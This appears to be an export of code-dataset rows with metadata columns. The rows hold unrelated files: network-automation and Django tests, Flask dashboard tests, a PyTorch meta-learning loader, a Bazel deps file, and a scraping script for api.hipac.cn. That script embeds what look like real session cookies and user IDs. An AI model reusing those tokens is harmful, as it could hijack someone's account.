# run test to generate the file
nr_with_tf = nr.with_processors(
[ToFileProcessor(tf="ntp_config", base_url="./tofile_outputs/")]
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_old,
"IOL2": iol2_res_old,
},
name="show run | inc ntp",
)
_ = nr_with_tf.run(
task=nr_test,
ret_data_per_host={
"IOL1": iol1_res_new,
"IOL2": iol2_res_new,
},
name="show run | inc ntp",
)
# run task to diff
output = nr.run(
task=file_diff,
base_url="./tofile_outputs/",
filegroup="ntp_config",
last="2, 1"
)
res = ResultSerializer(output, add_details=True)
# pprint.pprint(res, width=150)
# print(res["IOL1"]["ntp_config"]["result"])
# print(res["IOL2"]["ntp_config"]["result"])
assert """-ntp server 7.7.6.8
+ntp server 7.7.7.8
ntp server 7.7.7.7
-ntp server 1.1.1.1""" in res["IOL1"]["ntp_config"]["result"]
assert res["IOL1"]["ntp_config"]["result"].count("ntp_config") == 2
assert """-ntp server 7.7.7.9
+ntp server 7.7.7.7""" in res["IOL2"]["ntp_config"]["result"]
assert res["IOL2"]["ntp_config"]["result"].count("ntp_config") == 2
# test_file_diff_whole_result_last_2_1_string()
| 31.256777 | 89 | 0.473704 | 4,657 | 41,509 | 3.979171 | 0.050891 | 0.017484 | 0.015218 | 0.039178 | 0.874535 | 0.855 | 0.849064 | 0.840322 | 0.820949 | 0.794776 | 0 | 0.041427 | 0.379508 | 41,509 | 1,327 | 90 | 31.280332 | 0.678056 | 0.167361 | 0 | 0.707292 | 0 | 0 | 0.253584 | 0.001078 | 0 | 0 | 0 | 0 | 0.06875 | 1 | 0.022917 | false | 0.001042 | 0.019792 | 0 | 0.044792 | 0.00625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
70a6b5b5df8e29f917a4fe480be2e8cb8695f7e9 | 7,134 | py | Python | dfirtrack_main/tests/case/test_case_views.py | blackhatethicalhacking/dfirtrack | 9c2e13015291f2981d14d63c9683e7c447e91f3a | [
"MIT"
] | 4 | 2020-03-06T17:37:09.000Z | 2020-03-17T07:50:55.000Z | dfirtrack_main/tests/case/test_case_views.py | blackhatethicalhacking/dfirtrack | 9c2e13015291f2981d14d63c9683e7c447e91f3a | [
"MIT"
] | null | null | null | dfirtrack_main/tests/case/test_case_views.py | blackhatethicalhacking/dfirtrack | 9c2e13015291f2981d14d63c9683e7c447e91f3a | [
"MIT"
] | 1 | 2020-03-06T20:54:52.000Z | 2020-03-06T20:54:52.000Z | from django.contrib.auth.models import User
from django.test import TestCase
from dfirtrack_main.models import Case
import urllib.parse
class CaseViewTestCase(TestCase):
""" case view tests """
@classmethod
def setUpTestData(cls):
# create user
test_user = User.objects.create_user(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# create object
Case.objects.create(
case_name='case_1',
case_is_incident=True,
case_created_by_user_id=test_user,
)
def test_cases_list_not_logged_in(self):
""" test list view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/cases/', safe='')
# get response
response = self.client.get('/cases/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_cases_list_logged_in(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/')
# compare
self.assertEqual(response.status_code, 200)
def test_cases_list_template(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/case/cases_list.html')
def test_cases_list_get_user_context(self):
""" test list view """
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_case')
def test_cases_detail_not_logged_in(self):
""" test detail view """
# get object
case_1 = Case.objects.get(case_name='case_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/cases/' + str(case_1.case_id), safe='')
# get response
response = self.client.get('/cases/' + str(case_1.case_id), follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_cases_detail_logged_in(self):
""" test detail view """
# get object
case_1 = Case.objects.get(case_name='case_1')
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/' + str(case_1.case_id))
# compare
self.assertEqual(response.status_code, 200)
def test_cases_detail_template(self):
""" test detail view """
# get object
case_1 = Case.objects.get(case_name='case_1')
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/' + str(case_1.case_id))
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/case/cases_detail.html')
def test_cases_detail_get_user_context(self):
""" test detail view """
# get object
case_1 = Case.objects.get(case_name='case_1')
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/' + str(case_1.case_id))
# compare
self.assertEqual(str(response.context['user']), 'testuser_case')
def test_cases_add_not_logged_in(self):
""" test add view """
# create url
destination = '/login/?next=' + urllib.parse.quote('/cases/add/', safe='')
# get response
response = self.client.get('/cases/add/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_cases_add_logged_in(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/add/')
# compare
self.assertEqual(response.status_code, 200)
def test_cases_add_template(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/add/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/case/cases_add.html')
def test_cases_add_get_user_context(self):
""" test add view """
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/add/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_case')
def test_cases_edit_not_logged_in(self):
""" test edit view """
# get object
case_1 = Case.objects.get(case_name='case_1')
# create url
destination = '/login/?next=' + urllib.parse.quote('/cases/' + str(case_1.case_id) + '/edit/', safe='')
# get response
response = self.client.get('/cases/' + str(case_1.case_id) + '/edit/', follow=True)
# compare
self.assertRedirects(response, destination, status_code=302, target_status_code=200)
def test_cases_edit_logged_in(self):
""" test edit view """
# get object
case_1 = Case.objects.get(case_name='case_1')
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/' + str(case_1.case_id) + '/edit/')
# compare
self.assertEqual(response.status_code, 200)
def test_cases_edit_template(self):
""" test edit view """
# get object
case_1 = Case.objects.get(case_name='case_1')
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/' + str(case_1.case_id) + '/edit/')
# compare
self.assertTemplateUsed(response, 'dfirtrack_main/case/cases_edit.html')
def test_cases_edit_get_user_context(self):
""" test edit view """
# get object
case_1 = Case.objects.get(case_name='case_1')
# login testuser
login = self.client.login(username='testuser_case', password='DcHJ6AJkPn0YzSOm8Um6')
# get response
response = self.client.get('/cases/' + str(case_1.case_id) + '/edit/')
# compare
self.assertEqual(str(response.context['user']), 'testuser_case')
| 36.213198 | 111 | 0.631623 | 820 | 7,134 | 5.293902 | 0.084146 | 0.064501 | 0.039392 | 0.084773 | 0.890578 | 0.863856 | 0.851186 | 0.842433 | 0.778622 | 0.77079 | 0 | 0.021292 | 0.242921 | 7,134 | 196 | 112 | 36.397959 | 0.782448 | 0.133305 | 0 | 0.517647 | 0 | 0 | 0.155072 | 0.02341 | 0 | 0 | 0 | 0 | 0.188235 | 1 | 0.2 | false | 0.152941 | 0.047059 | 0 | 0.258824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
5651d2fd4424d06ee849d8c0fdbaa7bf3222fdf8 | 3,299 | py | Python | flask_monitoringdashboard/test/routings/test_result.py | Qqwy/Flask-MonitoringDashboard | 14d742076721b575adccc88275bb4ab4a5f59786 | [
"MIT"
] | null | null | null | flask_monitoringdashboard/test/routings/test_result.py | Qqwy/Flask-MonitoringDashboard | 14d742076721b575adccc88275bb4ab4a5f59786 | [
"MIT"
] | null | null | null | flask_monitoringdashboard/test/routings/test_result.py | Qqwy/Flask-MonitoringDashboard | 14d742076721b575adccc88275bb4ab4a5f59786 | [
"MIT"
] | null | null | null | import unittest
from flask_monitoringdashboard.test.utils import set_test_environment, clear_db, add_fake_data, get_test_app, login, \
NAME
class TestResult(unittest.TestCase):
def setUp(self):
set_test_environment()
clear_db()
add_fake_data()
self.app = get_test_app()
def test_result_heatmap(self):
"""
Just retrieve the content and check if nothing breaks
"""
self.assertEqual(302, self.app.get('dashboard/result/{}/heatmap'.format(NAME)).status_code)
login(self.app)
self.assertEqual(200, self.app.get('dashboard/result/{}/heatmap'.format(NAME)).status_code)
def test_result_time_per_hour(self):
"""
Just retrieve the content and check if nothing breaks
"""
self.assertEqual(302, self.app.get('dashboard/result/{}/time_per_hour'.format(NAME)).status_code)
login(self.app)
self.assertEqual(200, self.app.get('dashboard/result/{}/time_per_hour'.format(NAME)).status_code)
def test_result_hits_per_hour(self):
"""
Just retrieve the content and check if nothing breaks
"""
self.assertEqual(302, self.app.get('dashboard/result/{}/hits_per_hour'.format(NAME)).status_code)
login(self.app)
self.assertEqual(200, self.app.get('dashboard/result/{}/hits_per_hour'.format(NAME)).status_code)
def test_result_time_per_version_per_user(self):
"""
Just retrieve the content and check if nothing breaks
"""
self.assertEqual(302, self.app.get('dashboard/result/{}/time_per_version_per_user'.format(NAME)).status_code)
login(self.app)
self.assertEqual(200, self.app.get('dashboard/result/{}/time_per_version_per_user'.format(NAME)).status_code)
def test_result_time_per_version_per_ip(self):
"""
Just retrieve the content and check if nothing breaks
"""
self.assertEqual(302, self.app.get('dashboard/result/{}/time_per_version_per_ip'.format(NAME)).status_code)
login(self.app)
self.assertEqual(200, self.app.get('dashboard/result/{}/time_per_version_per_ip'.format(NAME)).status_code)
def test_result_time_per_version(self):
"""
Just retrieve the content and check if nothing breaks
"""
self.assertEqual(302, self.app.get('dashboard/result/{}/time_per_version'.format(NAME)).status_code)
login(self.app)
self.assertEqual(200, self.app.get('dashboard/result/{}/time_per_version'.format(NAME)).status_code)
def test_result_time_per_user(self):
"""
Just retrieve the content and check if nothing breaks
"""
self.assertEqual(302, self.app.get('dashboard/result/{}/time_per_user'.format(NAME)).status_code)
login(self.app)
self.assertEqual(200, self.app.get('dashboard/result/{}/time_per_user'.format(NAME)).status_code)
def test_result_outliers(self):
"""
Just retrieve the content and check if nothing breaks
"""
self.assertEqual(302, self.app.get('dashboard/result/{}/outliers'.format(NAME)).status_code)
login(self.app)
self.assertEqual(200, self.app.get('dashboard/result/{}/outliers'.format(NAME)).status_code) | 42.844156 | 118 | 0.669597 | 433 | 3,299 | 4.882217 | 0.115473 | 0.082781 | 0.080416 | 0.143803 | 0.92053 | 0.92053 | 0.919584 | 0.919584 | 0.885525 | 0.857143 | 0 | 0.018223 | 0.201576 | 3,299 | 77 | 119 | 42.844156 | 0.784358 | 0.130646 | 0 | 0.195122 | 0 | 0 | 0.209653 | 0.209653 | 0 | 0 | 0 | 0 | 0.390244 | 1 | 0.219512 | false | 0 | 0.04878 | 0 | 0.292683 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
568261b465d361566abe21a5712b1f0bfe4ae507 | 195 | py | Python | synapse/__init__.py | brymer-meneses/sparknet | b2978e4926522719c73ee0c15c136d5693a72bcb | [
"Apache-2.0"
] | 1 | 2021-05-04T23:05:22.000Z | 2021-05-04T23:05:22.000Z | synapse/__init__.py | brymer-meneses/sparknet | b2978e4926522719c73ee0c15c136d5693a72bcb | [
"Apache-2.0"
] | null | null | null | synapse/__init__.py | brymer-meneses/sparknet | b2978e4926522719c73ee0c15c136d5693a72bcb | [
"Apache-2.0"
] | null | null | null |
from synapse.core.tensor import Tensor
from synapse.core.ops import matmul, pow
from synapse.core.differentiable import Differentiable
from synapse.utils.grad_modes import grad_state, no_grad
| 24.375 | 56 | 0.841026 | 29 | 195 | 5.551724 | 0.482759 | 0.273292 | 0.279503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107692 | 195 | 7 | 57 | 27.857143 | 0.925287 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5695a9a3a7e1075f37a367d7f65d037a49289b58 | 9,596 | py | Python | maml/custom.py | ryujaehun/maml | fd38cb9258420c73648748fccdaa76f8d0b1c030 | [
"MIT"
] | 1 | 2021-03-24T16:23:47.000Z | 2021-03-24T16:23:47.000Z | maml/custom.py | ryujaehun/maml | fd38cb9258420c73648748fccdaa76f8d0b1c030 | [
"MIT"
] | null | null | null | maml/custom.py | ryujaehun/maml | fd38cb9258420c73648748fccdaa76f8d0b1c030 | [
"MIT"
] | null | null | null | import glob,os
import warnings
import numpy as np
import torch
from torch.utils.data import Dataset
warnings.filterwarnings("ignore")
import random
import torch.nn.functional as F
class GraphDataset(Dataset):
## task granularity is just split 100 points that is not consider task.
def __init__(self, ways=5, shot=5, test_shot=5, size=10000000, transform=None,val=False,template=True,save_path=None,sample=False,feature_size=128):
self.shot = shot
self.ways = ways
self.test_shot = test_shot
self.__save_path = '/root/incubator-tvm/result/2020_10_30'
self.transform=transform
self.__tasks = ('conv1d', 'conv1d_transpose', 'conv2d','conv2d_winograd', 'conv2d_transpose')
if val:
self.__tasks = ['conv2d','conv2d_winograd']
if template:
if sample:
self.__cost_path = list(map(lambda x: os.path.join(self.__save_path,x,'template',str(feature_size),'sample','label.npy'), self.__tasks))
self.__feature_path = list(map(lambda x: os.path.join(self.__save_path,x,'template',str(feature_size),'sample','batch_1.npy'), self.__tasks))
else:
self.__cost_path = list(map(lambda x: os.path.join(self.__save_path,x,'template',str(feature_size),'full','label.npy'), self.__tasks))
self.__feature_path = list(map(lambda x: os.path.join(self.__save_path,x,'template',str(feature_size),'full','batch_1.npy'), self.__tasks))
else:
if sample:
self.__cost_path = list(map(lambda x: os.path.join(self.__save_path,x,'non-template',str(feature_size),'sample','label.npy'), self.__tasks))
self.__feature_path = list(map(lambda x: os.path.join(self.__save_path,x, 'non-template',str(feature_size),'sample','batch_1.npy'), self.__tasks))
else:
self.__cost_path = list(map(lambda x: os.path.join(self.__save_path,x,'non-template',str(feature_size),'full','label.npy'), self.__tasks))
self.__feature_path = list(map(lambda x: os.path.join(self.__save_path,x, 'non-template',str(feature_size),'full','batch_1.npy'), self.__tasks))
_feature = []
for fea in self.__feature_path:
_feature.append(np.load(fea))
_cost = []
for cost in self.__cost_path:
_cost.append(np.load(cost))
self.__features=np.vstack(_feature).squeeze()
self.__costs=np.vstack(_cost).squeeze()
self.__n_task=int(np.ceil(len(self.__costs)/100))
self.__cost_len=len(self.__costs)
def __len__(self):
return self.__cost_len * self.shot*self.ways
def candidate(self,ways,shot):
_list=[]
for way in ways:
if way==self.__n_task-1:
_list.extend(random.sample(range(way*100,self.__cost_len), shot))
else:
_list.extend(random.sample(range(way*100,(way+1)*100), shot))
return np.array(_list)
def __getitem__(self, idx):
batch = dict()
ways = np.array(random.sample(range(self.__n_task), self.ways))
candidate=self.candidate(ways,self.shot)
train_data=np.take(self.__features, candidate,axis=0)
train_label=np.take(self.__costs, candidate,axis=0)
candidate=self.candidate(ways,self.test_shot)
test_data=np.take(self.__features, candidate,axis=0)
test_label=np.take(self.__costs, candidate,axis=0)
train_data = torch.tensor(train_data, dtype=torch.float32)
test_data = torch.tensor(test_data, dtype=torch.float32)
train_label = torch.tensor(train_label, dtype=torch.float32)
test_label = torch.tensor(test_label, dtype=torch.float32)
batch['train'] = (train_data, train_label)
batch['test'] = (test_data, test_label)
return batch
class GraphBatchDataset(Dataset):
def __init__(self, ways=5, shot=5, test_shot=5, size=10000000, transform=None, val=False,tasks=('conv1d', 'conv1d_transpose', 'conv2d', 'conv2d_winograd', 'conv2d_transpose') ,template=False,sample=False,feature_size=128):
self.shot = shot
self.ways = ways
self.test_shot = test_shot
self.__save_path = '/root/incubator-tvm/result/2020_10_30'
self.transform = transform
self.__tasks = tasks
if val:
self.__tasks = ['conv2d', 'conv2d_winograd','conv2d_transpose']
path = os.path.join(self.__save_path, 'all')
if template:
path_prefix = os.path.join(path, f'template/{feature_size}')
else:
path_prefix = os.path.join(path, f'non-template/{feature_size}')
if sample:
path_prefix = os.path.join(path_prefix, 'sample')
else:
path_prefix = os.path.join(path_prefix, 'full')
paths=[]
for p in self.__tasks:
paths.extend(glob.glob(os.path.join(path_prefix, 'new_data', p, '*', '[0-9]*')))
self.__cost_path = list(map(lambda x: os.path.join( x, 'label.npy'), paths))
self.__feature_path = list(map(lambda x: os.path.join( x, 'batch_1.npy'), paths))
self._feature = []
for fea in self.__feature_path:
self._feature.append(np.load(fea))
self._cost = []
for cost in self.__cost_path:
self._cost.append(np.load(cost))
self.__n_task = len(self.__cost_path)
def __len__(self):
return len(self._feature)*20*self.shot*self.ways
def candidate(self,ways,shot):
selection = [self._feature[index] for index in ways]
candidate = [random.sample(range(i.shape[0]), shot) for i in selection]
return np.array(candidate)
def __getitem__(self, idx):
batch = dict()
ways = np.array(random.sample(range(self.__n_task), self.ways))
candidate = self.candidate(ways,self.shot)
train_data = np.take(self._feature, candidate, axis=0)
train_label = np.take(self._cost, candidate, axis=0)
candidate = self.candidate(ways, self.test_shot)
test_data = np.take(self._feature, candidate, axis=0)
test_label = np.take(self._cost, candidate, axis=0)
train_data = torch.tensor(train_data, dtype=torch.float32)
test_data = torch.tensor(test_data, dtype=torch.float32)
train_label = torch.tensor(train_label, dtype=torch.float32)
test_label = torch.tensor(test_label, dtype=torch.float32)
batch['train'] = (train_data, train_label)
batch['test'] = (test_data, test_label)
return batch
class Conv2dGraphBatchDataset(Dataset):
def __init__(self, ways=5, shot=5, test_shot=5, size=10000000, transform=None, val=False,tasks='conv2d_mix' ,template=False,sample=False,feature_size=128):
self.shot = shot
self.ways = ways
self.test_shot = test_shot
self.__save_path = '/root/incubator-tvm/result/2020_10_30'
self.transform = transform
self.__tasks = tasks
if val:
self.__tasks = ['conv2d', 'conv2d_winograd','conv2d_transpose']
path = os.path.join(self.__save_path, f'{tasks}')
if template:
path_prefix = os.path.join(path, f'template/{feature_size}')
else:
path_prefix = os.path.join(path, f'non-template/{feature_size}')
if sample:
path_prefix = os.path.join(path_prefix, 'sample')
else:
path_prefix = os.path.join(path_prefix, 'full')
if val:
paths=[]
for p in self.__tasks:
paths.extend(glob.glob(os.path.join(path_prefix, 'new_data', p, '*', '[0-9]*')))
else:
if tasks=='conv2d_mix':
paths=glob.glob(os.path.join(path_prefix, 'new_data', '*', '*_[0-9]', '[0-9]*'),recursive=True)
else:
paths=glob.glob(os.path.join(path_prefix, 'new_data', '*', '*', '[0-9]*'),recursive=True)
self.__cost_path = list(map(lambda x: os.path.join( x, 'label.npy'), paths))
self.__feature_path = list(map(lambda x: os.path.join( x, 'batch_1.npy'), paths))
self._feature = []
for fea in self.__feature_path:
self._feature.append(np.load(fea))
print(len(self._feature))
self._cost = []
for cost in self.__cost_path:
self._cost.append(np.load(cost))
self.__n_task = len(self.__cost_path)
def __len__(self):
return len(self._feature)*20*self.shot*self.ways
def candidate(self,ways,shot):
selection = [self._feature[index] for index in ways]
candidate = [random.sample(range(i.shape[0]), shot) for i in selection]
return np.array(candidate)
def __getitem__(self, idx):
batch = dict()
ways = np.array(random.sample(range(self.__n_task), self.ways))
candidate = self.candidate(ways,self.shot)
train_data = np.take(self._feature, candidate, axis=0)
train_label = np.take(self._cost, candidate, axis=0)
candidate = self.candidate(ways, self.test_shot)
test_data = np.take(self._feature, candidate, axis=0)
test_label = np.take(self._cost, candidate, axis=0)
train_data = torch.tensor(train_data, dtype=torch.float32)
test_data = torch.tensor(test_data, dtype=torch.float32)
train_label = torch.tensor(train_label, dtype=torch.float32)
test_label = torch.tensor(test_label, dtype=torch.float32)
batch['train'] = (train_data, train_label)
batch['test'] = (test_data, test_label)
return batch | 45.051643 | 226 | 0.631826 | 1,296 | 9,596 | 4.395833 | 0.094136 | 0.027383 | 0.045638 | 0.035808 | 0.891873 | 0.888011 | 0.883096 | 0.855889 | 0.839565 | 0.812884 | 0 | 0.021948 | 0.230825 | 9,596 | 213 | 227 | 45.051643 | 0.749898 | 0.007086 | 0 | 0.729282 | 0 | 0 | 0.085573 | 0.022155 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066298 | false | 0 | 0.038674 | 0.016575 | 0.171271 | 0.005525 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3b06e9baf97b8cae1c28f2a56e08e875908bee67 | 293 | bzl | Python | test/deps.bzl | meteorcloudy/rules_rust | 215a8decfb06525a3f13b23fac5b3124eedabd27 | [
"Apache-2.0"
] | null | null | null | test/deps.bzl | meteorcloudy/rules_rust | 215a8decfb06525a3f13b23fac5b3124eedabd27 | [
"Apache-2.0"
] | null | null | null | test/deps.bzl | meteorcloudy/rules_rust | 215a8decfb06525a3f13b23fac5b3124eedabd27 | [
"Apache-2.0"
] | 1 | 2021-06-21T20:35:33.000Z | 2021-06-21T20:35:33.000Z | """A module defining dependencies of the `io_bazel_rules_rust` tests"""
load("//test/load_arbitrary_tool:load_arbitrary_tool_test.bzl", "load_arbitrary_tool_test")
def io_bazel_rules_rust_test_deps():
"""Load dependencies for io_bazel_rules_rust tests"""
load_arbitrary_tool_test()
| 32.555556 | 91 | 0.795222 | 44 | 293 | 4.795455 | 0.431818 | 0.246446 | 0.322275 | 0.227488 | 0.236967 | 0.236967 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098976 | 293 | 8 | 92 | 36.625 | 0.799242 | 0.385666 | 0 | 0 | 0 | 0 | 0.467456 | 0.467456 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3b66ab0cb4f9ea5e423f8c5047d38a1123454f35 | 49 | py | Python | main.py | francisbeboy/User_generator | d3c703651602248b715e156afa43d6145e41bbfa | [
"MIT"
] | null | null | null | main.py | francisbeboy/User_generator | d3c703651602248b715e156afa43d6145e41bbfa | [
"MIT"
] | null | null | null | main.py | francisbeboy/User_generator | d3c703651602248b715e156afa43d6145e41bbfa | [
"MIT"
] | null | null | null | from user import get_users
print(get_users(10)) | 24.5 | 28 | 0.795918 | 9 | 49 | 4.111111 | 0.777778 | 0.432432 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046512 | 0.122449 | 49 | 2 | 29 | 24.5 | 0.813953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
3b9532fbabeb347870a2c1504f4123187265526d | 1,634 | py | Python | HipacSpider/test.py | futheads/ScrapyProject | a3bfb221f914c0bdfb6569a9205be06ce019c507 | [
"Apache-2.0"
] | 2 | 2018-12-06T16:12:46.000Z | 2020-02-26T06:49:09.000Z | HipacSpider/test.py | futheads/ScrapyProject | a3bfb221f914c0bdfb6569a9205be06ce019c507 | [
"Apache-2.0"
] | null | null | null | HipacSpider/test.py | futheads/ScrapyProject | a3bfb221f914c0bdfb6569a9205be06ce019c507 | [
"Apache-2.0"
] | null | null | null | import requests
if __name__ == '__main__':
url = 'https://api.hipac.cn/process/prod/1.0.2/mall.item.searchItemListWithFlashBuyAct.pc/?' \
'appKey=1300&os=Chrome&t=1553848122455&sign=bd80c6d8138d464bf36b6e7bef78f7de' \
'&data={"pageNo":1,"pageSize":20,"sortType":"3","itemSearchTypes":"","searchSource":"cate"}'
headers = dict()
headers[
"Cookie"] = "acw_tc=2f624a3515525447331993547e61488470c932a13415163c14a7d1b308a802; uid=3a174da55e814f19a088f57b53cf611a; df=1f3fe8ed63ad88558e8c516f85b26a20-1697ae097cd_tongdun; yduss_production=M6zhthVOv904OhWpFYuNLJjk-Pp6ZAbwDQscSIN_eNs0uBdq5o8JkDS3WvOXPhvo18IPHuUW43slhaE5RMC2AgbP_iNT01tYb18w-3HPAAmxS2mbySuIPJTKR9uQ721q_A1xvprE73TuqUOEegTrRzX9leKeNvEMeoxvjJ3Z7U26ELiggXYM-W3KPBWGO9rptue_RgeeGwYlL37ZfLxDmr0cNrtMc_w_4JicN7nWstAcTYjIcMoPN-tP5QLWu5aouv_9XEvFmk6zB4CAq78q2kMm5jVvbS3VlUxaFzf1qxKY4O3edYxG1BkSMpM9alFpyM78kIX8kohBc6LHhmg7FxLNYDe9qTx9aXcCKFrTBB0l4AbjiqQXQ4xO65pu7cm5iI6MTbWhD0EpUOhjYKWPa9USed1ZWxbsCED5qYIrSqGFqa8oBAjyLxRUD00IIXCsJfg1zZ8WAPjT0fP0m2Mq3PxlC2UzrWoq-rFmQQw0FJfcfSJ1pzCo0iR1-zGodoSYrUqO8jGkJ76wKyTbdAyhLXJBb4wHr-L1bzksaLJYD4Uj9oqYjEtyg-JYPjQiLkcm3sJzIOYiU6g.; hipac.cn_USERID=3a174da55e814f19a088f57b53cf611a; hipac.cn_LASTLOGINTIME=1553848111526; hipac.cnuser_uuid=ebce1d6a-a47c-4016-90e6-b00d028da5cc; SERVERID=703df12c9070c5b89b89c38696dbd8d2|1553852284|1553848070"
headers[
"User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
headers["Host"] = "api.hipac.cn"
print(requests.get(url, headers=headers).json())
| 116.714286 | 1,002 | 0.829253 | 126 | 1,634 | 10.587302 | 0.81746 | 0.02099 | 0.014993 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.237748 | 0.075887 | 1,634 | 13 | 1,003 | 125.692308 | 0.645695 | 0 | 0 | 0.166667 | 0 | 0.333333 | 0.847001 | 0.69645 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0.083333 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3b9c4defafe98279b7383c7863eb7cd7f9e957a8 | 122 | py | Python | object_publisher/__init__.py | seagetch/object_publisher | 025ea721982da4be189ac2d0fa3f2f2cdbb22587 | [
"MIT"
] | null | null | null | object_publisher/__init__.py | seagetch/object_publisher | 025ea721982da4be189ac2d0fa3f2f2cdbb22587 | [
"MIT"
] | null | null | null | object_publisher/__init__.py | seagetch/object_publisher | 025ea721982da4be189ac2d0fa3f2f2cdbb22587 | [
"MIT"
] | null | null | null | from object_publisher.base import publish
from object_publisher.cli import CLI
